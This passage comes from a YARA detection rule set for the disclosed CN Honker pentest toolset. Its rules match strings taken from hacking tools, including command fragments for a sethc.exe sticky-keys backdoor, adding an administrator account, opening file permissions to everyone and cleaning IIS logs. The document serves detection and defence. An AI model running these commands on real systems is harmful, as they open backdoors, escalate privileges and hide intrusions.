||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "0b3c5015ba3616cbc616fc9ba805fea73e98bc83"
|
||
|
id = "79195823-f88b-5c28-8b99-a43a9d6c94af"
|
||
|
strings:
|
||
|
$s0 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
|
||
|
$s1 = "(http://www.eyuyan.com)" fullword wide
|
||
|
$s2 = "GetConnectString" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Htran_V2_40_htran20 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
|
||
|
id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
|
||
|
strings:
|
||
|
$s1 = "%s -slave ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "[SERVER]connection to %s:%d error" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "%s -connect ConnectHost [ConnectPort] Default:%d" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s5 = "[+] got, ip:%s, port:%d" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s6 = "[-] There is a error...Create a new connection." fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_DictionaryGenerator {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
|
||
|
id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
|
||
|
strings:
|
||
|
$s1 = "`PasswordBuilder" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "cracker" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 3650KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ms11080_withcmd {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ms11080_withcmd.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "745e5058acff27b09cfd6169caf6e45097881a49"
|
||
|
id = "38c12697-7e52-5713-a566-6047abfa229b"
|
||
|
strings:
|
||
|
$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "[>] create pipe error" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 340KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_T00ls_Lpk_Sethc_v2 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v2.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "a995451d9108687b8892ad630a79660a021d670a"
|
||
|
id = "499b251a-e0e1-5550-825d-acab112be74b"
|
||
|
strings:
|
||
|
$s1 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "2011-2012 T00LS&RICES" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 800KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_HASH_32 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file 32.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
|
||
|
id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
|
||
|
strings:
|
||
|
$s5 = "[Undefined OS version] Major: %d Minor: %d" fullword ascii
|
||
|
$s8 = "Try To Run As Administrator ..." fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s9 = "Specific LUID NOT found" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 240KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_windows_mstsc_enhanced_RMDSTC {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file RMDSTC.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "3ca2b1b6f31219baf172abcc8f00f07f560e465f"
|
||
|
id = "f6e94327-cb79-5a7a-88bb-850177558978"
|
||
|
strings:
|
||
|
$s0 = "zava zir5@163.com" fullword wide
|
||
|
$s1 = "By newccc" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 400KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_sig_3389_mstsc_MSTSCAX {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file MSTSCAX.DLL"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "2fa006158b2d87b08f1778f032ab1b8e139e02c6"
|
||
|
id = "9508b613-f897-5277-97e0-30e36fb5d747"
|
||
|
strings:
|
||
|
$s1 = "ResetPasswordWWWx" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Terminal Server Redirected Printer Doc" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Cleaning temp directory" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_T00ls_scanner {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file T00ls_scanner.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "70b04b910d82b32b90cd7f355a0e3e17dd260cb3"
|
||
|
id = "80d4a950-24cb-55c7-903f-8788a71be7ac"
|
||
|
strings:
|
||
|
$s0 = "http://cn.bing.com/search?first=1&count=50&q=ip:" fullword wide
|
||
|
$s17 = "Team:www.t00ls.net" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 330KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_GetHashes {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
|
||
|
id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
|
||
|
strings:
|
||
|
$s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 87KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_hashq_Hashq {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Hashq.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "7518b647db5275e8a9e0bf4deda3d853cc9d5661"
|
||
|
id = "4f435edf-28bf-5195-bc22-0d2a7302b312"
|
||
|
strings:
|
||
|
$s1 = "Hashq.exe" fullword wide
|
||
|
$s5 = "CnCert.Net" fullword wide
|
||
|
$s6 = "Md5 query tool" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 600KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ShiftBackdoor_Server {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Server.dat"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "b24d761c6bbf216792c4833890460e8b37d86b37"
|
||
|
id = "c53f4015-ad2b-5898-88b5-34b3bc2c65b6"
|
||
|
strings:
|
||
|
$s0 = "del /q /f %systemroot%system32sethc.exe" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "cacls %s /t /c /e /r administrators" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "\\dllcache\\sethc.exe" ascii
|
||
|
$s3 = "\\ntvdm.exe" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_exp_win2003 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file win2003.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "47164c8efe65d7d924753fadf6cdfb897a1c03db"
|
||
|
id = "f64e14dd-714c-5a0f-923d-23a584fe605f"
|
||
|
strings:
|
||
|
$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "The shell \"cmd\" success!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Not Windows NT family OS." fullword ascii /* PEStudio Blacklist: os */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 100KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Interception3389_setup {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file setup.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f5b2f86f8e7cdc00aa1cb1b04bc3d278eb17bf5c"
|
||
|
id = "7250ff73-6b08-56a4-b2bc-081060d1fa2d"
|
||
|
strings:
|
||
|
$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\%s" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "%s\\temp\\temp%d.bat" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s5 = "EventStartShell" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s6 = "del /f /q \"%s\"" fullword ascii
|
||
|
$s7 = "\\wminotify.dll" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 400KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_CnCerT_CCdoor_CMD_2 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "7f3a6fb30845bf366e14fa21f7e05d71baa1215a"
|
||
|
id = "2681a989-6504-5ac7-abc9-e6dad2a052c5"
|
||
|
strings:
|
||
|
$s0 = "cmd.dll" fullword wide
|
||
|
$s1 = "cmdpath" fullword ascii
|
||
|
$s2 = "Get4Bytes" fullword ascii
|
||
|
$s3 = "ExcuteCmd" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 22KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_exp_ms11046 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ms11046.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
|
||
|
id = "aafb45f4-3b42-5c8f-8c25-40fd01217e9d"
|
||
|
strings:
|
||
|
$s0 = "[*] Token system command" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "[*] command add user 90sec 90sec" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "[*] Add to Administrators success" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 3 times */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Master_beta_1_7 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "3be7a370791f29be89acccf3f2608fd165e8059e"
|
||
|
id = "78f904ec-f7cb-5fd0-a117-925ebedd1d3e"
|
||
|
strings:
|
||
|
$s1 = "http://seo.chinaz.com/?host=" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Location: getpass.asp?info=" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 312KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_F4ck_Team_f4ck_2 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "0783661077312753802bd64bf5d35c4666ad0a82"
|
||
|
id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
|
||
|
strings:
|
||
|
$s1 = "F4ck.exe" fullword wide
|
||
|
$s2 = "@Netapi32.dll" fullword ascii
|
||
|
$s3 = "Team.F4ck.Net" fullword wide
|
||
|
$s8 = "Administrators" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 14 times */
|
||
|
$s9 = "F4ck Team" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_sig_3389_80_AntiFW {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file AntiFW.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "5fbc75900e48f83d0e3592ea9fa4b70da72ccaa3"
|
||
|
id = "761bed41-e8e6-585b-8fde-a6b6a56445d6"
|
||
|
strings:
|
||
|
$s1 = "Set TS to port:80 Successfully!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Now,set TS to port 80" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "echo. >>amethyst.reg" fullword ascii
|
||
|
$s4 = "del amethyst.reg" fullword ascii
|
||
|
$s5 = "AntiFW.cpp" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 30KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_wwwscan_gui {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file wwwscan_gui.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
|
||
|
id = "fffed806-4394-505a-96bd-50bf6f24aefc"
|
||
|
strings:
|
||
|
$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "/eye2007Admin_login.aspx" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 280KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_SwordCollEdition {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file SwordCollEdition.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "6e14f21cac6e2aa7535e45d81e8d1f6913fd6e8b"
|
||
|
id = "4e8d4d48-c053-5579-be9c-af73ec0fe614"
|
||
|
strings:
|
||
|
$s0 = "YuJianScan.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s1 = "YuJianScan" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 225KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_HconSTFportable {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
|
||
|
id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
|
||
|
strings:
|
||
|
$s1 = "HconSTFportable.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "www.Hcon.in" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 354KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_T00ls_Lpk_Sethc_v3_LPK {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
|
||
|
id = "c5b806d9-74dc-5244-b1e0-9837abeaeaac"
|
||
|
strings:
|
||
|
$s1 = "FreeHostKillexe.exe" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "\\sethc.exe /G everyone:F" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "c:\\1.exe" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Set user Group Error! Username:" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 400KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Without_a_trace_Wywz {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Wywz.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f443c43fde643228ee95def5c8ed3171f16daad8"
|
||
|
id = "1093c0c3-499f-5aec-ad4a-878d377296d5"
|
||
|
strings:
|
||
|
$s1 = "\\Symantec\\Norton Personal Firewall\\Log\\Content.log" ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "UpdateFile=d:\\tool\\config.ini,Option\\\\proxyIp=127.0.0.1\\r\\nproxyPort=808" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "%s\\subinacl.exe /subkeyreg \"%s\" /Grant=%s=f /Grant=everyone=f" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1800KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_LPK2_0_LPK {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "5a1226e73daba516c889328f295e728f07fdf1c3"
|
||
|
id = "4aa40b78-5fe4-5312-881c-e5a292435ff0"
|
||
|
strings:
|
||
|
$s1 = "\\sethc.exe /G everyone:F" ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "net1 user guest guest123!@#" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "\\dllcache\\sethc.exe" ascii
|
||
|
$s4 = "sathc.exe 211" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1030KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_cleaniis {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file cleaniis.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "372bc64c842f6ff0d9a1aa2a2a44659d8b88cb40"
|
||
|
id = "75f3c33a-e3b8-57bc-a3fd-f8b6491388d8"
|
||
|
strings:
|
||
|
$s1 = "iisantidote <logfile dir> <ip or string to hide>" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "IIS log file cleaner by Scurt" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_arp3_7_arp3_7 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file arp3.7.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "db641a9dfec103b98548ac7f6ca474715040f25c"
|
||
|
id = "a4aeefaf-a097-5ba3-a18f-54a1b9752883"
|
||
|
strings:
|
||
|
$s1 = "CnCerT.Net.SKiller.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "www.80sec.com" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 4000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_exp_ms11080 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ms11080.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
|
||
|
id = "2f5ce2f3-3595-5729-be0c-3f6486cb94fd"
|
||
|
strings:
|
||
|
$s2 = "[*] command add user 90sec 90sec" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s6 = "[*] Add to Administrators success" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 840KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Injection_transit {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f4fef2e3d310494a3c3962a49c7c5a9ea072b2ea"
|
||
|
id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
|
||
|
strings:
|
||
|
$s0 = "<description>Your app description here</description> " fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide /* PEStudio Blacklist: os */
|
||
|
$s5 = "ScriptnackgBun" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 3175KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Safe3WVS {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Safe3WVS.EXE"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "fee3acacc763dc55df1373709a666d94c9364a7f"
|
||
|
id = "035ecb73-3dbc-55d2-8d0c-b71308094d18"
|
||
|
strings:
|
||
|
$s0 = "2TerminateProcess" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "mscoreei.dll" fullword ascii /* reversed goodware string 'lld.ieerocsm' */
|
||
|
$s7 = "SafeVS.exe" fullword wide
|
||
|
$s8 = "www.safe3.com.cn" fullword wide
|
||
|
$s20 = "SOFTWARE\\Classes\\Interface\\" ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_NBSI_3_0 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
